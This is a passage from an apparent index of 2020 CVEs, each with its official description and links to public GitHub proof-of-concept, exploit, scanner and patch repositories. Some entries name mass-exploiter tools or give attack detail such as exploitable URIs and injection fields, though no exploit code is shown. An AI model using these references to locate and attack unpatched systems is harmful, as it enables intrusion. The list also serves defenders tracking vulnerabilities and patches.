their address, they can freely change the id_address in the form, and thus steal someone else's address. It is the same with CustomerForm, you are able to change the id_customer and change all information of all accounts. The problem is patched in version 1.7.6.4. + + +- [drkbcn/lblfixer_cve2020_5250](https://github.com/drkbcn/lblfixer_cve2020_5250) + +### CVE-2020-5254 (2020-03-10) + +In NetHack before 3.6.6, some out-of-bound values for the hilite_status option can be exploited. NetHack 3.6.6 resolves this issue. + + +- [dpmdpm2/CVE-2020-5254](https://github.com/dpmdpm2/CVE-2020-5254) + +### CVE-2020-5260 (2020-04-14) + +Affected versions of Git have a vulnerability whereby Git can be tricked into sending private credentials to a host controlled by an attacker. Git uses external "credential helper" programs to store and retrieve passwords or other credentials from secure storage provided by the operating system. Specially-crafted URLs that contain an encoded newline can inject unintended values into the credential helper protocol stream, causing the credential helper to retrieve the password for one server (e.g., good.example.com) for an HTTP request being made to another server (e.g., evil.example.com), resulting in credentials for the former being sent to the latter. There are no restrictions on the relationship between the two, meaning that an attacker can craft a URL that will present stored credentials for any host to a host of their choosing. The vulnerability can be triggered by feeding a malicious URL to git clone. However, the affected URLs look rather suspicious; the likely vector would be through systems which automatically clone URLs not visible to the user, such as Git submodules, or package systems built around Git. The problem has been patched in the versions published on April 14th, 2020, going back to v2.17.x. Anyone wishing to backport the change further can do so by applying commit 9a6bbee (the full release includes extra checks for git fsck, but that commit is sufficient to protect clients against the vulnerability). The patched versions are: 2.17.4, 2.18.3, 2.19.4, 2.20.3, 2.21.2, 2.22.3, 2.23.2, 2.24.2, 2.25.3, 2.26.1. + + +- [brompwnie/cve-2020-5260](https://github.com/brompwnie/cve-2020-5260) +- [Asgavar/CVE-2020-5260](https://github.com/Asgavar/CVE-2020-5260) +- [sv3nbeast/CVE-2020-5260](https://github.com/sv3nbeast/CVE-2020-5260) + +### CVE-2020-5267 (2020-03-19) + +In ActionView before versions 6.0.2.2 and 5.2.4.2, there is a possible XSS vulnerability in ActionView's JavaScript literal escape helpers. Views that use the `j` or `escape_javascript` methods may be susceptible to XSS attacks. The issue is fixed in versions 6.0.2.2 and 5.2.4.2. + + +- [GUI/legacy-rails-CVE-2020-5267-patch](https://github.com/GUI/legacy-rails-CVE-2020-5267-patch) + +### CVE-2020-5377 (2020-07-28) + +Dell EMC OpenManage Server Administrator (OMSA) versions 9.4 and prior contain multiple path traversal vulnerabilities. An unauthenticated remote attacker could potentially exploit these vulnerabilities by sending a crafted Web API request containing directory traversal character sequences to gain file system access on the compromised management station. + + +- [und3sc0n0c1d0/AFR-in-OMSA](https://github.com/und3sc0n0c1d0/AFR-in-OMSA) +- [n3rdh4x0r/CVE-2020-5377](https://github.com/n3rdh4x0r/CVE-2020-5377) + +### CVE-2020-5398 (2020-01-16) + +In Spring Framework, versions 5.2.x prior to 5.2.3, versions 5.1.x prior to 5.1.13, and versions 5.0.x prior to 5.0.16, an application is vulnerable to a reflected file download (RFD) attack when it sets a "Content-Disposition" header in the response where the filename attribute is derived from user supplied input. + + +- [motikan2010/CVE-2020-5398](https://github.com/motikan2010/CVE-2020-5398) + +### CVE-2020-5410 (2020-06-02) + +Spring Cloud Config, versions 2.2.x prior to 2.2.3, versions 2.1.x prior to 2.1.9, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead to a directory traversal attack. + + +- [dead5nd/config-demo](https://github.com/dead5nd/config-demo) +- [osamahamad/CVE-2020-5410-POC](https://github.com/osamahamad/CVE-2020-5410-POC) + +### CVE-2020-5421 (2020-09-19) + +In Spring Framework versions 5.2.0 - 5.2.8, 5.1.0 - 5.1.17, 5.0.0 - 5.0.18, 4.3.0 - 4.3.28, and older unsupported versions, the protections against RFD attacks from CVE-2015-5211 may be bypassed depending on the browser used through the use of a jsessionid path parameter. + + +- [pandaMingx/CVE-2020-5421](https://github.com/pandaMingx/CVE-2020-5421) + +### CVE-2020-5504 (2020-01-09) + +In phpMyAdmin 4 before 4.9.4 and 5 before 5.0.1, SQL injection exists in the user accounts page. A malicious user could inject custom SQL in place of their own username when creating queries to this page. An attacker must have a valid MySQL account to access the server. + + +- [xMohamed0/CVE-2020-5504-phpMyAdmin](https://github.com/xMohamed0/CVE-2020-5504-phpMyAdmin) + +### CVE-2020-5752 (2020-05-21) + +Relative path traversal in Druva inSync Windows Client 6.6.3 allows a local, unauthenticated attacker to execute arbitrary operating system commands with SYSTEM privileges. + + +- [yevh/CVE-2020-5752-Druva-inSync-Windows-Client-6.6.3---Local-Privilege-Escalation-PowerShell-](https://github.com/yevh/CVE-2020-5752-Druva-inSync-Windows-Client-6.6.3---Local-Privilege-Escalation-PowerShell-) + +### CVE-2020-5837 (2020-05-11) + +Symantec Endpoint Protection, prior to 14.3, may not respect file permissions when writing to log files that are replaced by symbolic links, which can lead to a potential elevation of privilege. + + +- [RedyOpsResearchLabs/SEP-14.2-Arbitrary-Write](https://github.com/RedyOpsResearchLabs/SEP-14.2-Arbitrary-Write) + +### CVE-2020-5839 (2020-07-08) + +Symantec Endpoint Detection And Response, prior to 4.4, may be susceptible to an information disclosure issue, which is a type of vulnerability that could potentially allow unauthorized access to data. + + +- [nasbench/CVE-2020-5839](https://github.com/nasbench/CVE-2020-5839) + +### CVE-2020-5842 (2020-01-07) + +Codoforum 4.8.3 allows XSS in the user registration page: via the username field to the index.php?u=/user/register URI. The payload is, for example, executed on the admin/index.php?page=users/manage page. + + +- [prasanthc41m/codoforum](https://github.com/prasanthc41m/codoforum) + +### CVE-2020-5844 (2020-03-16) + +index.php?sec=godmode/extensions&sec2=extensions/files_repo in Pandora FMS v7.0 NG allows authenticated administrators to upload malicious PHP scripts, and execute them via base64 decoding of the file location. This affects v7.0NG.742_FIX_PERL2020. + + +- [TheCyberGeek/CVE-2020-5844](https://github.com/TheCyberGeek/CVE-2020-5844) +- [UNICORDev/exploit-CVE-2020-5844](https://github.com/UNICORDev/exploit-CVE-2020-5844) + +### CVE-2020-5902 (2020-07-01) + +In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages. + + +- [dwisiswant0/CVE-2020-5902](https://github.com/dwisiswant0/CVE-2020-5902) +- [aqhmal/CVE-2020-5902-Scanner](https://github.com/aqhmal/CVE-2020-5902-Scanner) +- [jas502n/CVE-2020-5902](https://github.com/jas502n/CVE-2020-5902) +- [ar0dd/CVE-2020-5902](https://github.com/ar0dd/CVE-2020-5902) +- [yassineaboukir/CVE-2020-5902](https://github.com/yassineaboukir/CVE-2020-5902) +- [rwincey/CVE-2020-5902-NSE](https://github.com/rwincey/CVE-2020-5902-NSE) +- [un4gi/CVE-2020-5902](https://github.com/un4gi/CVE-2020-5902) +- [nsflabs/CVE-2020-5902](https://github.com/nsflabs/CVE-2020-5902) +- [yasserjanah/CVE-2020-5902](https://github.com/yasserjanah/CVE-2020-5902) +- [JSec1337/RCE-CVE-2020-5902](https://github.com/JSec1337/RCE-CVE-2020-5902) +- [dunderhay/CVE-2020-5902](https://github.com/dunderhay/CVE-2020-5902) +- [r0ttenbeef/cve-2020-5902](https://github.com/r0ttenbeef/cve-2020-5902) +- [sv3nbeast/CVE-2020-5902_RCE](https://github.com/sv3nbeast/CVE-2020-5902_RCE) +- [cybersecurityworks553/scanner-CVE-2020-5902](https://github.com/cybersecurityworks553/scanner-CVE-2020-5902) +- [lijiaxing1997/CVE-2020-5902-POC-EXP](https://github.com/lijiaxing1997/CVE-2020-5902-POC-EXP) +- [qlkwej/poc-CVE-2020-5902](https://github.com/qlkwej/poc-CVE-2020-5902) +- [Zinkuth/F5-BIG-IP-CVE-2020-5902](https://github.com/Zinkuth/F5-BIG-IP-CVE-2020-5902) +- [0xAbdullah/CVE-2020-5902](https://github.com/0xAbdullah/CVE-2020-5902) +- [jinnywc/CVE-2020-5902](https://github.com/jinnywc/CVE-2020-5902) +- [GoodiesHQ/F5-Patch](https://github.com/GoodiesHQ/F5-Patch) +- [jiansiting/CVE-2020-5902](https://github.com/jiansiting/CVE-2020-5902) +- [wdlid/CVE-2020-5902-fix](https://github.com/wdlid/CVE-2020-5902-fix) +- [Any3ite/CVE-2020-5902-F5BIG](https://github.com/Any3ite/CVE-2020-5902-F5BIG) +- [k3nundrum/CVE-2020-5902](https://github.com/k3nundrum/CVE-2020-5902) +- [inho28/CVE-2020-5902-F5-BIGIP](https://github.com/inho28/CVE-2020-5902-F5-BIGIP) +- [cristiano-corrado/f5_scanner](https://github.com/cristiano-corrado/f5_scanner) +- [ajdumanhug/CVE-2020-5902](https://github.com/ajdumanhug/CVE-2020-5902) +- [zhzyker/CVE-2020-5902](https://github.com/zhzyker/CVE-2020-5902) +- [GovindPalakkal/EvilRip](https://github.com/GovindPalakkal/EvilRip) +- [dnerzker/CVE-2020-5902](https://github.com/dnerzker/CVE-2020-5902) +- [renanhsilva/checkvulnCVE20205902](https://github.com/renanhsilva/checkvulnCVE20205902) +- [halencarjunior/f5scan](https://github.com/halencarjunior/f5scan) +- [deepsecurity-pe/GoF5-CVE-2020-5902](https://github.com/deepsecurity-pe/GoF5-CVE-2020-5902) +- [Shu1L/CVE-2020-5902-fofa-scan](https://github.com/Shu1L/CVE-2020-5902-fofa-scan) +- [d4rk007/F5-Big-IP-CVE-2020-5902-mass-exploiter](https://github.com/d4rk007/F5-Big-IP-CVE-2020-5902-mass-exploiter) +- [TheCyberViking/CVE-2020-5902-Vuln-Checker](https://github.com/TheCyberViking/CVE-2020-5902-Vuln-Checker) +- [MrCl0wnLab/checker-CVE-2020-5902](https://github.com/MrCl0wnLab/checker-CVE-2020-5902) +- [qiong-qi/CVE-2020-5902-POC](https://github.com/qiong-qi/CVE-2020-5902-POC) +- [theLSA/f5-bigip-rce-cve-2020-5902](https://github.com/theLSA/f5-bigip-rce-cve-2020-5902) +- [flyopenair/CVE-2020-5902](https://github.com/flyopenair/CVE-2020-5902) +- [Al1ex/CVE-2020-5902](https://github.com/Al1ex/CVE-2020-5902) +- [freeFV/CVE-2020-5902-fofa-scan](https://github.com/freeFV/CVE-2020-5902-fofa-scan) +- [momika233/cve-2020-5902](https://github.com/momika233/cve-2020-5902) +- [rockmelodies/CVE-2020-5902-rce-gui](https://github.com/rockmelodies/CVE-2020-5902-rce-gui) +- [f5devcentral/cve-2020-5902-ioc-bigip-checker](https://github.com/f5devcentral/cve-2020-5902-ioc-bigip-checker) +- [corelight/CVE-2020-5902-F5BigIP](https://github.com/corelight/CVE-2020-5902-F5BigIP) +- [PushpenderIndia/CVE-2020-5902-Scanner](https://github.com/PushpenderIndia/CVE-2020-5902-Scanner) +- [murataydemir/CVE-2020-5902](https://github.com/murataydemir/CVE-2020-5902) +- [superzerosec/cve-2020-5902](https://github.com/superzerosec/cve-2020-5902) +- [ludy-dev/BIG-IP-F5-TMUI-RCE-Vulnerability](https://github.com/ludy-dev/BIG-IP-F5-TMUI-RCE-Vulnerability) +- [faisalfs10x/F5-BIG-IP-CVE-2020-5902-shodan-scanner](https://github.com/faisalfs10x/F5-BIG-IP-CVE-2020-5902-shodan-scanner) +- [haisenberg/CVE-2020-5902](https://github.com/haisenberg/CVE-2020-5902) +- [west9b/F5-BIG-IP-POC](https://github.com/west9b/F5-BIG-IP-POC) +- [z3n70/CVE-2020-5902](https://github.com/z3n70/CVE-2020-5902) +- [34zY/APT-Backpack](https://github.com/34zY/APT-Backpack) +- [amitlttwo/CVE-2020-5902](https://github.com/amitlttwo/CVE-2020-5902) + +### CVE-2020-5903 (2020-07-01) + +In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, a Cross-Site Scripting (XSS) vulnerability exists in an undisclosed page of the BIG-IP Configuration utility. + + +- [ltvthang/CVE-2020-5903](https://github.com/ltvthang/CVE-2020-5903) + +### CVE-2020-6207 (2020-03-10) + +SAP Solution Manager (User Experience Monitoring), version- 7.2, due to Missing Authentication Check does not perform any authentication for a service resulting in complete compromise of all SMDAgents connected to the Solution Manager. + + +- [chipik/SAP_EEM_CVE-2020-6207](https://github.com/chipik/SAP_EEM_CVE-2020-6207) + +### CVE-2020-6286 (2020-07-14) + +The insufficient input path validation of certain parameter in the web service of SAP NetWeaver AS JAVA (LM Configuration Wizard), versions - 7.30, 7.31, 7.40, 7.50, allows an unauthenticated attacker to exploit a method to download zip files to a specific directory, leading to Path Traversal. + + +- [murataydemir/CVE-2020-6286](https://github.com/murataydemir/CVE-2020-6286) + +### CVE-2020-6287 (2020-07-14) + +SAP NetWeaver AS JAVA (LM Configuration Wizard), versions - 7.30, 7.31, 7.40, 7.50, does not perform an authentication check which allows an attacker without prior authentication to execute configuration tasks to perform critical actions against the SAP Java system, including the ability to create an administrative user, and therefore compromising Confidentiality, Integrity and Availability of the system, leading to Missing Authentication Check. + + +- [chipik/SAP_RECON](https://github.com/chipik/SAP_RECON) +- [duc-nt/CVE-2020-6287-exploit](https://github.com/duc-nt/CVE-2020-6287-exploit) +- [Onapsis/CVE-2020-6287_RECON-scanner](https://github.com/Onapsis/CVE-2020-6287_RECON-scanner) +- [ynsmroztas/CVE-2020-6287-Sap-Add-User](https://github.com/ynsmroztas/CVE-2020-6287-Sap-Add-User) +- [murataydemir/CVE-2020-6287](https://github.com/murataydemir/CVE-2020-6287) +- [qmakake/SAP_CVE-2020-6287_find_mandate](https://github.com/qmakake/SAP_CVE-2020-6287_find_mandate) +- [dylvie/CVE-2020-6287_SAP-NetWeaver-bypass-auth](https://github.com/dylvie/CVE-2020-6287_SAP-NetWeaver-bypass-auth) + +### CVE-2020-6308 (2020-10-20) + +SAP BusinessObjects Business Intelligence Platform (Web Services) versions - 410, 420, 430, allows an unauthenticated attacker to inject arbitrary values as CMS parameters to perform lookups on the internal network which is otherwise not accessible externally. On successful exploitation, attacker can scan internal network to determine internal infrastructure and gather information for further attacks like remote file inclusion, retrieve server files, bypass firewall and force the vulnerable server to perform malicious requests, resulting in a Server-Side Request Forgery vulnerability. + + +- [InitRoot/CVE-2020-6308-PoC](https://github.com/InitRoot/CVE-2020-6308-PoC) +- [freeFV/CVE-2020-6308-mass-exploiter](https://github.com/freeFV/CVE-2020-6308-mass-exploiter) +- [TheMMMdev/CVE-2020-6308](https://github.com/TheMMMdev/CVE-2020-6308) +- [MachadoOtto/sap_bo_launchpad-ssrf-timing_attack](https://github.com/MachadoOtto/sap_bo_launchpad-ssrf-timing_attack) + +### CVE-2020-6364 (2020-10-15) + +SAP Solution Manager and SAP Focused Run (update provided in WILY_INTRO_ENTERPRISE 9.7, 10.1, 10.5, 10.7), allows an attacker to modify a cookie in a way that OS commands can be executed and potentially gain control over the host running the CA Introscope Enterprise Manager,leading to Code Injection. With this, the attacker is able to read and modify all system files and also impact system availability. + + +- [gquere/CVE-2020-6364](https://github.com/gquere/CVE-2020-6364) + +### CVE-2020-6418 (2020-02-27) + +Type confusion in V8 in Google Chrome prior to 80.0.3987.122 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. + + +- [ChoKyuWon/CVE-2020-6418](https://github.com/ChoKyuWon/CVE-2020-6418) +- [Goyotan/CVE-2020-6418-PoC](https://github.com/Goyotan/CVE-2020-6418-PoC) +- [ulexec/ChromeSHELFLoader](https://github.com/ulexec/ChromeSHELFLoader) +- [SivaPriyaRanganatha/CVE-2020-6418](https://github.com/SivaPriyaRanganatha/CVE-2020-6418) + +### CVE-2020-6468 (2020-05-21) + +Type confusion in V8 in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. + + +- [Goyotan/CVE-2020-6468-PoC](https://github.com/Goyotan/CVE-2020-6468-PoC) +- [kiks7/CVE-2020-6468-Chrome-Exploit](https://github.com/kiks7/CVE-2020-6468-Chrome-Exploit) + +### CVE-2020-6514 (2020-07-22) + +Inappropriate implementation in WebRTC in Google Chrome prior to 84.0.4147.89 allowed an attacker in a privileged network position to potentially exploit heap corruption via a crafted SCTP stream. + + +- [hasan-khalil/CVE-2020-6514](https://github.com/hasan-khalil/CVE-2020-6514) + +### CVE-2020-6516 (2020-07-22) + +Policy bypass in CORS in Google Chrome prior to 84.0.4147.89 allowed a remote attacker to leak cross-origin data via a crafted HTML page. + + +- [CENSUS/whatsapp-mitd-mitm](https://github.com/CENSUS/whatsapp-mitd-mitm) + +### CVE-2020-6519 (2020-07-22) + +Policy bypass in CSP in Google Chrome prior to 84.0.4147.89 allowed a remote attacker to bypass content security policy via a crafted HTML page. + + +- [PerimeterX/CVE-2020-6519](https://github.com/PerimeterX/CVE-2020-6519) + +### CVE-2020-6650 (2020-03-23) + +UPS companion software v1.05 & Prior is affected by ‘Eval Injection’ vulnerability. The software does not neutralize or incorrectly neutralizes code syntax before using the input in a dynamic evaluation call e.g.”eval” in “Update Manager” class when software attempts to see if there are updates available. This results in arbitrary code execution on the machine where software is installed. + + +- [RavSS/Eaton-UPS-Companion-Exploit](https://github.com/RavSS/Eaton-UPS-Companion-Exploit) + +### CVE-2020-6861 (2020-05-06) + +A flawed protocol design in the Ledger Monero app before 1.5.1 for Ledger Nano and Ledger S devices allows a local attacker to extract the master spending key by sending crafted messages to this app selected on a PIN-entered Ledger connected to a host PC. + + +- [ph4r05/ledger-app-monero-1.42-vuln](https://github.com/ph4r05/ledger-app-monero-1.42-vuln) + +### CVE-2020-6888 +- [section-c/CVE-2020-6888](https://github.com/section-c/CVE-2020-6888) + +### CVE-2020-7048 (2020-01-16) + +The WordPress plugin, WP Database Reset through 3.1, contains a flaw that allowed any unauthenticated user to reset any table in the database to the initial WordPress set-up state (deleting all site content stored in that table), as demonstrated by a wp-admin/admin-post.php?db-reset-tables[]=comments URI. + + +- [ElmouradiAmine/CVE-2020-7048](https://github.com/ElmouradiAmine/CVE-2020-7048) + +### CVE-2020-7115 (2020-06-03) + +The ClearPass Policy Manager web interface is affected by a vulnerability that leads to authentication bypass. Upon successful bypass an attacker could then execute an exploit that would allow to remote command execution in the underlying operating system. Resolution: Fixed in 6.7.13-HF, 6.8.5-HF, 6.8.6, 6.9.1 and higher. + + +- [Retr02332/CVE-2020-7115](https://github.com/Retr02332/CVE-2020-7115) + +### CVE-2020-7200 (2020-12-18) + +A potential security vulnerability has been identified in HPE Systems Insight Manager (SIM) version 7.6. The vulnerability could be exploited to allow remote code execution. + + +- [alexfrancow/CVE-2020-7200](https://github.com/alexfrancow/CVE-2020-7200) + +### CVE-2020-7246 (2020-01-21) + +A remote code execution (RCE) vulnerability exists in qdPM 9.1 and earlier. An attacker can upload a malicious PHP code file via the profile photo functionality, by leveraging a path traversal vulnerability in the users['photop_preview'] delete photo feature, allowing bypass of .htaccess protection. NOTE: this issue exists because of an incomplete fix for CVE-2015-3884. + + +- [j0hn30n/CVE-2020-7246](https://github.com/j0hn30n/CVE-2020-7246) +- [arafatansari/SecAssignment](https://github.com/arafatansari/SecAssignment) +- [pswalia2u/CVE-2020-7246](https://github.com/pswalia2u/CVE-2020-7246) + +### CVE-2020-7247 (2020-01-29) + +smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the "uncommented" default configuration. The issue exists because of an incorrect return value upon failure of input validation. + + +- [FiroSolutions/cve-2020-7247-exploit](https://github.com/FiroSolutions/cve-2020-7247-exploit) +- [superzerosec/cve-2020-7247](https://github.com/superzerosec/cve-2020-7247) +- [r0lh/CVE-2020-7247](https://github.com/r0lh/CVE-2020-7247) +- [QTranspose/CVE-2020-7247-exploit](https://github.com/QTranspose/CVE-2020-7247-exploit) +- [bytescrappers/CVE-2020-7247](https://github.com/bytescrappers/CVE-2020-7247) +- [f4T1H21/CVE-2020-7247](https://github.com/f4T1H21/CVE-2020-7247) +- [SimonSchoeni/CVE-2020-7247-POC](https://github.com/SimonSchoeni/CVE-2020-7247-POC) +- [presentdaypresenttime/shai_hulud](https://github.com/presentdaypresenttime/shai_hulud) + +### CVE-2020-7283 (2020-07-03) + +Privilege Escalation vulnerability in McAfee Total Protection (MTP) before 16.0.R26 allows local users to create and edit files via symbolic link manipulation in a location they would otherwise not have access to. This is achieved through running a malicious script or program on the target machine. + + +- [RedyOpsResearchLabs/CVE-2020-7283-McAfee-Total-Protection-MTP-16.0.R26-EoP](https://github.com/RedyOpsResearchLabs/CVE-2020-7283-McAfee-Total-Protection-MTP-16.0.R26-EoP) + +### CVE-2020-7352 (2020-08-06) + +The GalaxyClientService component of GOG Galaxy runs with elevated SYSTEM privileges in a Windows environment. Due to the software shipping with embedded, static RSA private key, an attacker with this key material and local user permissions can effectively send any operating system command to the service for execution in this elevated context. The service listens for such commands on a locally-bound network port, localhost:9978. A Metasploit module has been published which exploits this vulnerability. This issue affects the 2.0.x branch of the software (2.0.12 and earlier) as well as the 1.2.x branch (1.2.64 and earlier). A fix was issued for the 2.0.x branch of the affected software. + + +- [szerszen199/PS-CVE-2020-7352](https://github.com/szerszen199/PS-CVE-2020-7352) + +### CVE-2020-7378 (2020-11-24) + +CRIXP OpenCRX version 4.30 and 5.0-20200717 and prior suffers from an unverified password change vulnerability. An attacker who is able to connect to the affected OpenCRX instance can change the password of any user, including admin-Standard, to any chosen value. This issue was resolved in version 5.0-20200904, released September 4, 2020. + + +- [ruthvikvegunta/openCRX-CVE-2020-7378](https://github.com/ruthvikvegunta/openCRX-CVE-2020-7378) + +### CVE-2020-7384 (2020-10-29) + +Rapid7's Metasploit msfvenom framework handles APK files in a way that allows for a malicious user to craft and publish a file that would execute arbitrary commands on a victim's machine. + + +- [nikhil1232/CVE-2020-7384](https://github.com/nikhil1232/CVE-2020-7384) +- [0xCarsonS/CVE-2020-7384](https://github.com/0xCarsonS/CVE-2020-7384) + +### CVE-2020-7388 (2021-07-22) + +Sage X3 Unauthenticated Remote Command Execution (RCE) as SYSTEM in AdxDSrv.exe component. By editing the client side authentication request, an attacker can bypass credential validation. While exploiting this does require knowledge of the installation path, that information can be learned by exploiting CVE-2020-7387. This issue was fixed in AdxAdmin 93.2.53, which ships with updates for on-premises versions of Sage X3 including Version 9 (components shipped with Syracuse 9.22.7.2 and later), Sage X3 HR & Payroll Version 9 (those components that ship with Syracuse 9.24.1.3), Version 11 (components shipped with Syracuse 11.25.2.6 and later), and Version 12 (components shipped with Syracuse 12.10.2.8 and later) of Sage X3. Other on-premises versions of Sage X3 are unsupported by the vendor. + + +- [ac3lives/sagex3-cve-2020-7388-poc](https://github.com/ac3lives/sagex3-cve-2020-7388-poc) + +### CVE-2020-7461 (2021-03-26) + +In FreeBSD 12.1-STABLE before r365010, 11.4-STABLE before r365011, 12.1-RELEASE before p9, 11.4-RELEASE before p3, and 11.3-RELEASE before p13, dhclient(8) fails to handle certain malformed input related to handling of DHCP option 119 resulting a heap overflow. The heap overflow could in principle be exploited to achieve remote code execution. The affected process runs with reduced privileges in a Capsicum sandbox, limiting the immediate impact of an exploit. + + +- [knqyf263/CVE-2020-7461](https://github.com/knqyf263/CVE-2020-7461) +- [0xkol/freebsd-dhclient-poc](https://github.com/0xkol/freebsd-dhclient-poc) + +### CVE-2020-7471 (2020-02-03) + +Django 1.11 before 1.11.28, 2.2 before 2.2.10, and 3.0 before 3.0.3 allows SQL Injection if untrusted data is used as a StringAgg delimiter (e.g., in Django applications that offer downloads of data as a series of rows with a user-specified column delimiter). By passing a suitably crafted delimiter to a contrib.postgres.aggregates.StringAgg instance, it was possible to break escaping and inject malicious SQL. + + +- [Saferman/CVE-2020-7471](https://github.com/Saferman/CVE-2020-7471) +- [secoba/DjVul_StringAgg](https://github.com/secoba/DjVul_StringAgg) +- [SNCKER/CVE-2020-7471](https://github.com/SNCKER/CVE-2020-7471) +- [Tempuss/CTF_CVE-2020-7471](https://github.com/Tempuss/CTF_CVE-2020-7471) +- [victomteng1997/cve-2020-7471-Time_Blind_SQLi-](https://github.com/victomteng1997/cve-2020-7471-Time_Blind_SQLi-) +- [huzaifakhan771/CVE-2020-7471-Django](https://github.com/huzaifakhan771/CVE-2020-7471-Django) +- [mrlihd/CVE-2020-7471](https://github.com/mrlihd/CVE-2020-7471) + +### CVE-2020-7473 (2020-05-07) + +In certain situations, all versions of Citrix ShareFile StorageZones (aka storage zones) Controller, including the most recent 5.10.x releases as of May 2020, allow unauthenticated attackers to access the documents and folders of ShareFile users. NOTE: unlike most CVEs, exploitability depends on the product version that was in use when a particular setup step was performed, NOT the product version that is in use during a current assessment of a CVE consumer's product inventory. Specifically, the vulnerability can be exploited if a storage zone was created by one of these product versions: 5.9.0, 5.8.0, 5.7.0, 5.6.0, 5.5.0, or earlier. This CVE differs from CVE-2020-8982 and CVE-2020-8983 but has essentially the same risk. + + +- [DimitriNL/CTX-CVE-2020-7473](https://github.com/DimitriNL/CTX-CVE-2020-7473) + +### CVE-2020-7661 (2020-06-04) + +all versions of url-regex are vulnerable to Regular Expression Denial of Service. An attacker providing a very long string in String.test can cause a Denial of Service. + + +- [spamscanner/url-regex-safe](https://github.com/spamscanner/url-regex-safe) + +### CVE-2020-7693 (2020-07-09) + +Incorrect handling of Upgrade header with the value websocket leads in crashing of containers hosting sockjs apps. This affects the package sockjs before 0.3.20. + + +- [andsnw/sockjs-dos-py](https://github.com/andsnw/sockjs-dos-py) + +### CVE-2020-7699 (2020-07-30) + +This affects the package express-fileupload before 1.1.8. If the parseNested option is enabled, sending a corrupt HTTP request can lead to denial of service or arbitrary code execution. + + +- [hemaoqi-Tom/CVE-2020-7699_reproduce](https://github.com/hemaoqi-Tom/CVE-2020-7699_reproduce) + +### CVE-2020-7740 (2020-10-06) + +This affects all versions of package node-pdf-generator. Due to lack of user input validation and sanitization done to the content given to node-pdf-generator, it is possible for an attacker to craft a url that will be passed to an external server allowing an SSRF attack. + + +- [CS4239-U6/node-pdf-generator-ssrf](https://github.com/CS4239-U6/node-pdf-generator-ssrf) + +### CVE-2020-7799 (2020-01-28) + +An issue was discovered in FusionAuth before 1.11.0. An authenticated user, allowed to edit e-mail templates (Home -> Settings -> Email Templates) or themes (Home -> Settings -> Themes), can execute commands on the underlying operating system by abusing freemarker.template.utility.Execute in the Apache FreeMarker engine that processes custom templates. + + +- [Pikaqi/cve-2020-7799](https://github.com/Pikaqi/cve-2020-7799) +- [ianxtianxt/CVE-2020-7799](https://github.com/ianxtianxt/CVE-2020-7799) + +### CVE-2020-7897 +- [mooneee/cve-2020-7897](https://github.com/mooneee/cve-2020-7897) + +### CVE-2020-7931 (2020-01-23) + +In JFrog Artifactory 5.x and 6.x, insecure FreeMarker template processing leads to remote code execution, e.g., by modifying a .ssh/authorized_keys file. Patches are available for various versions between 5.11.8 and 6.16.0. The issue exists because use of the DefaultObjectWrapper class makes certain Java functions accessible to a template. + + +- [gquere/CVE-2020-7931](https://github.com/gquere/CVE-2020-7931) + +### CVE-2020-7934 (2020-01-28) + +In LifeRay Portal CE 7.1.0 through 7.2.1 GA2, the First Name, Middle Name, and Last Name fields for user accounts in MyAccountPortlet are all vulnerable to a persistent XSS issue. Any user can modify these fields with a particular XSS payload, and it will be stored in the database. The payload will then be rendered when a user utilizes the search feature to search for other users (i.e., if a user with modified fields occurs in the search results). This issue was fixed in Liferay Portal CE version 7.3.0 GA1. + + +- [3ndG4me/liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934](https://github.com/3ndG4me/liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934) +- [Sergio235705/audit-xss-cve-2020-7934](https://github.com/Sergio235705/audit-xss-cve-2020-7934) + +### CVE-2020-7961 (2020-03-20) + +Deserialization of Untrusted Data in Liferay Portal prior to 7.2.1 CE GA2 allows remote attackers to execute arbitrary code via JSON web services (JSONWS). + + +- [mzer0one/CVE-2020-7961-POC](https://github.com/mzer0one/CVE-2020-7961-POC) +- [wcxxxxx/CVE-2020-7961](https://github.com/wcxxxxx/CVE-2020-7961) +- [thelostworldFree/CVE-2020-7961-payloads](https://github.com/thelostworldFree/CVE-2020-7961-payloads) +- [shacojx/LifeRCEJsonWSTool-POC-CVE-2020-7961-Gui](https://github.com/shacojx/LifeRCEJsonWSTool-POC-CVE-2020-7961-Gui) +- [shacojx/GLiferay-CVE-2020-7961-golang](https://github.com/shacojx/GLiferay-CVE-2020-7961-golang) +- [shacojx/POC-CVE-2020-7961-Token-iterate](https://github.com/shacojx/POC-CVE-2020-7961-Token-iterate) +- [ShutdownRepo/CVE-2020-7961](https://github.com/ShutdownRepo/CVE-2020-7961) +- [CrackerCat/CVE-2020-7961-Mass](https://github.com/CrackerCat/CVE-2020-7961-Mass) +- [pashayogi/CVE-2020-7961-Mass](https://github.com/pashayogi/CVE-2020-7961-Mass) +- [manrop2702/CVE-2020-7961](https://github.com/manrop2702/CVE-2020-7961) +- [NMinhTrung/LIFERAY-CVE-2020-7961](https://github.com/NMinhTrung/LIFERAY-CVE-2020-7961) + +### CVE-2020-7980 (2020-01-25) + +Intellian Aptus Web 1.24 allows remote attackers to execute arbitrary OS commands via the Q field within JSON data to the cgi-bin/libagent.cgi URI. NOTE: a valid sid cookie for a login to the intellian default account might be needed. + + +- [Xh4H/Satellian-CVE-2020-7980](https://github.com/Xh4H/Satellian-CVE-2020-7980) + +### CVE-2020-8004 (2020-04-06) + +STMicroelectronics STM32F1 devices have Incorrect Access Control. + + +- [wuxx/CVE-2020-8004](https://github.com/wuxx/CVE-2020-8004) + +### CVE-2020-8012 (2020-02-18) + +CA Unified Infrastructure Management (Nimsoft/UIM) 20.1, 20.3.x, and 9.20 and below contains a buffer overflow vulnerability in the robot (controller) component. A remote attacker can execute arbitrary 